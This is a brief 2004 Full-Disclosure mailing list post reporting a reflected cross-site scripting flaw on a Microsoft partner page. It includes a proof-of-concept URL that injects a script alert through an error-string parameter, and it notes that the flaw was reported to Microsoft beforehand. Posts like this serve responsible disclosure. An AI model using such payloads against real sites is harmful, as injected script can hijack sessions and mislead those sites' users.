Hmmm. Another one:
https://mocl.one.microsoft.com/cwdl/CW_Auth.asp?PartnerAction=pick&strErrorString=<script>alert()</script>
Vulnerability reported to the MS in September. Published under RFPolicy.
(c)oded by offtopic_at_mail.ru
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Received on Nov 05 2004